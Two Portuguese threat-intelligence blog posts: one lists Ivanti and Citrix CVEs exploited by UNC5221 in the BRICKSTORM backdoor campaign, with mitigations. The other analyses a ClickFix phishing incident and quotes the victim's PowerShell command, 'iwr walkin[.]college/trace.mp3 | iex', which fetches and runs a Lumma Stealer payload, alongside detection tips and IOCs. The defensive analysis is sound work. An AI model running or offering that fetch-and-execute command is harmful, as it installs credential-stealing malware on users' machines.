Tag: malware

Vol. 1 No. 20251226-1078 (2025)

Vulnerabilidades Associadas à Campanha BRICKSTORM e aos Atores UNC5221

Adriano Cansian | adriano.cansian@unesp.br | 26/12/2025

Complementando as informações sobre a campanha BRICKSTORM, sobre a qual falamos em postagem anterior.

Atribuída ao grupo UNC5221 (atores patrocinados pela China), BRICKSTORM está associada a múltiplas vulnerabilidades críticas em dispositivos de perímetro e em infraestruturas de acesso remoto. Embora BRICKSTORM em si não seja uma vulnerabilidade específica (ela é um malware do tipo “backdoor“), os atores exploram várias CVEs para obter acesso inicial aos ambientes das vítimas.

A seguir listamos todas as CVEs que apuramos estarem associadas a essa campanha. Nossa recomendação é que o leitor faça a gestão de vulnerabilidades e corrija ou mitigue essas vulnerabilidades, para evitar ser vítima dessa campanha.

Observação: os valores de EPSS foram levantados em 26/12/2025.

CVEs Explorados por UNC5221

1. CVE-2025-0282 e CVE-2025-0283 (Ivanti Connect Secure)

Tipo: Buffer Overflow / Autenticação.

Plataforma: Ivanti Connect Secure (“ICS”) VPN appliances.

Versões Afetadas: 22.7R2.5 e anteriores

Data de Divulgação: 8 de janeiro de 2025.

Severidade: Crítica

EPSS (CVE-2025-0282): 94.11% – Probabilidade muito alta de exploração nos próximos 30 dias.

EPSS (CVE-2025-0283): 22.99% – Probabilidade moderada de exploração nos próximos 30 dias.

Descrição: CVE-2025-0282 é um buffer overflow baseado em stack não autenticado que permite execução remota de código (RCE). Exploração bem-sucedida resulta em acesso não autenticado ao appliance VPN, levando a comprometimento potencial de toda a rede downstream.

Exploração por UNC5221: Zero-day exploitation começou em meados de dezembro de 2024. Após exploração, UNC5221 implanta múltiplas famílias de malware customizado incluindo ZIPLINE, THINSPOOL, LIGHTWIRE e WARPWIRE.

Técnicas Pós-Exploração:

  • Desabilitar SELinux;
  • Bloquear syslog forwarding via iptables;
  • Remontar drive como read-write;
  • Implantar web shells em getComponent.cgi e restAuth.cgi;
  • Usar PHASEJAM dropper para modificações persistentes;
  • Simular atualizações do sistema para evitar detecção.

2. CVE-2025-22457 (Ivanti Connect Secure)

Tipo: Buffer Overflow.

Plataforma: Ivanti Connect Secure VPN appliances.

Versões Afetadas: 22.7R2.5 e anteriores, 9.x (end of life).

Data de Divulgação: 3 de abril de 2025.

Severidade: Crítica.

EPSS: 49.13% – Probabilidade moderada-alta de exploração nos próximos 30 dias

Descrição: Buffer overflow que permite execução remota de código. Exploração bem-sucedida resulta em RCE no appliance VPN.

Exploração por UNC5221: Exploração ativa observada desde março de 2025. Após exploração inicial, UNC5221 implanta BRICKSTORM e outras ferramentas de backdoor para manter acesso persistente.

3. CVE-2023-46805 (Ivanti Connect Secure)

Tipo: Authentication Bypass.

Plataforma: Ivanti Connect Secure VPN.

Data de Descoberta: Dezembro de 2023.

Severidade: Crítica.

EPSS: 94.37% – Probabilidade muito alta de exploração nos próximos 30 dias.

Descrição: Bypass de autenticação que permite acesso não autorizado ao appliance.

Exploração por UNC5221: Explorado desde dezembro de 2023 como parte de campanha de longa duração. Combinado com CVE-2024-21887 para obter acesso inicial.

Malware Implantado: ZIPLINE (passive backdoor), THINSPOOL (dropper), LIGHTWIRE (web shell), WARPWIRE (credential harvester).

4. CVE-2024-21887 (Ivanti Connect Secure)

Tipo: Command Injection.

Plataforma: Ivanti Connect Secure VPN.

Data de Descoberta: 2023-2024.

Severidade: Crítica.

EPSS: 94.41% – Probabilidade muito alta de exploração nos próximos 30 dias.

Descrição: Injeção de comando que permite execução de comandos arbitrários.

Exploração por UNC5221: Explorado em conjunto com CVE-2023-46805 para obter acesso inicial e executar código malicioso.

5. CVE-2023-4966 (Citrix NetScaler ADC/Gateway)

Tipo: Divulgação de Informação Sensível / Buffer Overflow.

Plataforma: Citrix NetScaler ADC e NetScaler Gateway appliances.

Severidade: Crítica.

EPSS: 94.35% – Probabilidade muito alta de exploração nos próximos 30 dias.

Exploração por UNC5221: Zero-day exploitation documentado. Parte do histórico de UNC5221 de exploração de zero-days em dispositivos edge.

Relação com BRICKSTORM

Como já mencionado, BRICKSTORM não é uma vulnerabilidade específica, mas sim um malware backdoor implantado após exploração bem-sucedida de uma das CVEs acima. O fluxo típico de ataque é:

  1. Acesso Inicial: Exploração de CVE em dispositivo edge (Ivanti, NetScaler, etc.).
  2. Implantação de Malware: Após RCE, UNC5221 implanta BRICKSTORM ou outras ferramentas de backdoor.
  3. Persistência: BRICKSTORM estabelece comunicação C2 criptografada e permite movimento lateral.
  4. Movimento Lateral: BRICKSTORM facilita acesso a VMware vCenter, controladores de domínio e outros sistemas críticos.

Ecosistema de Malware Associado

UNC5221 utiliza um ecosistema de malware sofisticado chamado SPAWN, que inclui:

  • SPAWNANT: Installer/loader.
  • SPAWNMOLE: Tunneler para movimento lateral.
  • SPAWNSNAIL: SSH backdoor.
  • SPAWNCHIMERA: Variante adicional
  • ZIPLINE: Passive backdoor.
  • THINSPOOL: Dropper.
  • LIGHTWIRE: Web shell.
  • WARPWIRE: Credential harvester.
  • PHASEJAM: Dropper específico para Ivanti.
  • BRICKSTORM: Backdoor para VMware e Windows.

Padrão Operacional de UNC5221

  1. Foco em Edge Devices: Preferência consistente por exploração de vulnerabilidades em appliances de perímetro (VPN, load balancers, etc.).
  2. Zero-Day Exploitation: Histórico de acesso e exploração de vulnerabilidades zero-day.
  3. Desenvolvimento Ativo: Contínuo desenvolvimento e modificação de malware.
  4. Ofuscação de Origem: Uso de redes de appliances comprometidos (Cyberoam, QNAP, ASUS routers) para mascarar origem real.
  5. Movimento Lateral Sofisticado: Após acesso inicial, movimento lateral para infraestrutura crítica com mínima telemetria
  6. Persistência de Longo Prazo: Tempo médio de permanência não detectada de 393 dias.

O Tempo médio de permanência não detectada do BRICKSTORM é de 393 dias

Recomendações

  1. Manter patches atualizados em todos appliances edge.
  2. Implementar monitoramento especializado em dispositivos VPN e load balancers.
  3. Usar MFA em todos acessos administrativos.
  4. Implementar segmentação de rede adequada.
  5. Monitorar atividades de reconhecimento (requisições sequenciais de versão).
  6. Realizar busca ativa (hunt) por artefatos de BRICKSTORM em VMware vCenter.

Referências

  • Google Threat Intelligence Group. “Ivanti Connect Secure VPN Targeted in New Zero-Day Exploitation.” 8/12/2025
  • Google Threat Intelligence Group. “Suspected China-Nexus Threat Actor Actively Exploiting Critical Ivanti Connect Secure Vulnerability (CVE-2025-22457).” 3/04/2025
  • Mandiant Services. “Another BRICKSTORM: Stealthy Backdoor Enabling Espionage into Tech and Legal Sectors.” 24/09/2025
  • CISA. “BRICKSTORM Backdoor – Malware Analysis Report (AR25-338A).” 19/12/2025

Vol. 1 No. 20250725-792 (2025)

Um clique, um comando, uma brecha

Yuri Augusto | yuri@cylo.com.br | 25/07/2025

Como já é de conhecimento geral, o elo mais fraco em um ataque é a interferência humana, seja em caso de falhas (bugs), phishing ou engenharia social.
Em um caso recente, o usuário tentou executar um arquivo malicioso e teve a ação bloqueada. Ao verificar o hash do arquivo suspeito (localizado em uma pasta temporária) no Virus Total, o arquivo foi identificado como Powershell.
Em seguida, busquei por comandos que pudessem ter sido executados anteriormente para gerar esse arquivo na pasta temporária. Nem sempre é possível recuperar o histórico de comandos do Powershell, mas neste caso encontrei o seguinte registro no arquivo ConsoleHost_history.txt, localizado em AppData:

iwr walkin[.]college/trace.mp3 | iex # You're Human

Além disso, identifiquei também comandos altamente ofuscados executados pelo .NET . Nesse ponto, já era evidente que se tratava de um ataque de engenharia social relativamente novo: o ClearFake/ClickFix. Nesse tipo de ataque, o usuário acessa um site e é induzido a abrir o menu “Executar” do Windows, colar um código e pressionar Enter. Trata-se, basicamente, de uma variação de phishing com o uso de captcha para dar aparência de legitimidade.

Exemplo de como é realizado o ataque.

Apesar de relativamente recente, esse tipo de ataque já vem sendo amplamente utilizado por diversas famílias de malware.

Gráfico das infecções semanais em 2025.

O sucesso desse ataque se deve à sua simplicidade. O usuário é induzido a digitar, por conta própria, o código malicioso, facilitando o ponto de entrada na estação. A partir daí, o código é executado e inicia-se o download de arquivos maliciosos.
Realizei uma busca na internet e encontrei o script utilizado, bem como a metodologia do ataque. Há indícios de que o malware pertença à família Lumma Stealer.

Algumas maneiras de detectar a atividade maliciosa:

  • Eventos de segurança – eventID 4668 (process creation): procurar instâncias do powershell.exe que tenha explorer.exe como processo pai e que apresente associação com o EventID 4663 (object access) envolvendo arquivos na pasta %LocalAppData%\Microsoft\Windows\WinX\
  • Padrões de uso de shell: identificar sessões elevadas de powershell com comunicações suspeitas ou criação de processos incomuns, como certutil.exe, mshta.exe ou rundll32.exe.

Algumas maneiras para dificultar o roubo de credenciais:

  • Habilitar autenticação multifator (MFA).
  • Adotar métodos de autenticação resistentes à phishing, como FIDO, passkey, e evitar métodos de autenticação SMS.
  • Utilizar AppLocker para restringir aplicações não autorizadas no ambiente.
  • Desabilitar powershell para usuários que não possuem privilégios administrativos.

Felizmente o ataque não chegou a esse ponto, pois foi barrado pelo XDR. No entanto, isso nos alerta para uma das estratégias mais básicas, treinar os usuários, que são os principais alvos dos atacantes. Não se espera que o usuário entenda códigos ou saiba reconhecer ataques, porém, com orientações básicas é possível evitar problemas significativamente mais graves.

Indicators of compromise:
SHA256 – 45fb3902a652c7f083bd3f090bf1a0d9ee3b0503256da6cbbce5a8fcaacc7b0d
Domínio – walkin[.]college/trace.mp3

Mais informações do indicador:
https://www.virustotal.com/gui/file/45fb3902a652c7f083bd3f090bf1a0d9ee3b0503256da6cbbce5a8fcaacc7b0d
https://hybrid-analysis.com/sample/45fb3902a652c7f083bd3f090bf1a0d9ee3b0503256da6cbbce5a8fcaacc7b0d/6882e7fcd6da29a55105d6ab

Referências:
https://unit42.paloaltonetworks.com/preventing-clickfix-attack-vector/
https://www.microsoft.com/en-us/security/blog/2025/05/21/lumma-stealer-breaking-down-the-delivery-techniques-and-capabilities-of-a-prolific-infostealer/